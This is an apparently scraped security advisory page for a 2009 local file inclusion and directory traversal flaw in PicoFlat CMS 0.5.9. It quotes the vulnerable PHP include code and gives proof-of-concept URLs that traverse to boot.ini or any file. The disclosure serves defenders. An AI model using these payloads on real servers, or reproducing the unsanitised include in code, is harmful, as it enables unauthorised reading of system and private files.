PicoFlat CMS 0.5.9 Local File Inclusion Vulnerabilitty (win)

2009-04-07 / 2009-04-08
Credit: gmda
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

--------------------------------------------------------------------------- type attacak:Local File inclusion and that the possibility of a Directory traversal Windows disclosure boot.ini site name picoflatcms 0.5.9 download http://picoflat.altervista.org/index.php? by gmda <!-- gmda@email.it --> --------------------------------------------------------------------------- bug code <?php if (eregi('://', $pagina) || eregi('\?', $pagina)) { $pagina = ""; include "notfound.php"; }else{ include $pagina; } ?> p.o.c http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini http://127.0.0.1/path/index.php?pagina=[file]

References:

http://www.securityfocus.com/bid/29424
http://www.milw0rm.com/exploits/5690


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top